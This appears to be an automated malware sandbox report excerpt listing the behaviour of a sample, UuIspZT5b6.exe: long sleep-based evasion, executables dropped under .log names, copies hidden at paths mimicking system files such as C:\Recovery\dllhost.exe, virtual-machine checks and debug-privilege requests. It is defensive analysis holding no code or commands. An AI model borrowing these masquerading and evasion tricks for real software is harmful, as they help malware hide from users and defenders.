                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 600000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599881
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599734
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599623
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599514
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599390
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599274
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599169
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599062
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 3600000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598951
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598843
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 300000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598718
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598563
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598214
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598085
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597930
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597734
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597590
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597464
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597358
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597246
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597130
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596984
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596836
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596718
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596609
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596496
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596375
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596265
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596040
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595794
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595680
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595578
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595465
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595250
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595140
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595010
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594906
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594797
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594682
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594578
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594468
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594250
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594140
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594017
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593901
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593500
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593350
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593232
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593117
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592999
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592886
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592757
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592621
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592500
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592390
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592280
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3754Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3776Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3619
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3421
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3159
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3290
                          Source: C:\Recovery\dllhost.exeWindow / User API: threadDelayed 9665
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDropped PE file which has not been started: C:\Users\user\Desktop\gSKbOmrW.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\tznhlkeP.logJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Recovery\dllhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CkfpANUC.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\MQZNFpoe.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDropped PE file which has not been started: C:\Users\user\Desktop\UZVKerGo.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDropped PE file which has not been started: C:\Users\user\Desktop\WkrLeKmp.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDropped PE file which has not been started: C:\Users\user\Desktop\yfmgiIMl.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeDropped PE file which has not been started: C:\Users\user\Desktop\pfMyjKNB.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CcvWVetw.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\lVerBrOi.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe TID: 7068Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Recovery\dllhost.exe TID: 1516Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Recovery\dllhost.exe TID: 7132Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep count: 3754 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 3776 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep count: 3619 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 3421 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep count: 3159 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 3290 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe TID: 8020Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe TID: 4428Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe TID: 7556Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe TID: 7836Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7320Thread sleep time: -30000s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -34126476536362649s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -600000s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -599881s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -599734s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -599623s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -599514s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -599390s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -599274s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -599169s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -599062s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7492Thread sleep time: -3600000s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -598951s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -598843s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7492Thread sleep time: -300000s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -598718s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -598563s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -598359s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -598214s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -598085s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597930s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597734s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597590s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597464s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597358s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597246s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -597130s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596984s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596836s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596718s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596609s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596496s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596375s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596265s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -596040s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595794s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595680s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595578s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595465s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595359s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595250s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595140s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -595010s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594906s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594797s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594682s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594578s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594468s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594359s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594250s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594140s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -594017s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593901s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593500s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593350s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593232s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -593117s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592999s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592886s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592757s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592621s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592500s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592390s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 7468Thread sleep time: -592280s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 6324Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe TID: 2128Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe TID: 2212Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe TID: 340Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\dllhost.exe TID: 6260Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Recovery\dllhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Recovery\dllhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 30000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 600000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599881
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599734
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599623
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599514
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599390
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599274
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599169
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 599062
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 3600000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598951
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598843
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 300000
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598718
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598563
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598214
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 598085
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597930
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597734
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597590
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597464
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597358
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597246
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 597130
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596984
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596836
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596718
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596609
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596496
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596375
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596265
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 596040
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595794
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595680
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595578
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595465
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595250
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595140
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 595010
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594906
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594797
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594682
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594578
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594468
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594359
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594250
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594140
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 594017
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593901
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593500
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593350
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593232
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 593117
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592999
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592886
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592757
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592621
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592500
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592390
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 592280
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: UuIspZT5b6.exe, 00000000.00000002.1885155255.000000001C505000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA*J
                          Source: w32tm.exe, 0000002D.00000002.1873608640.000002C6F9447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
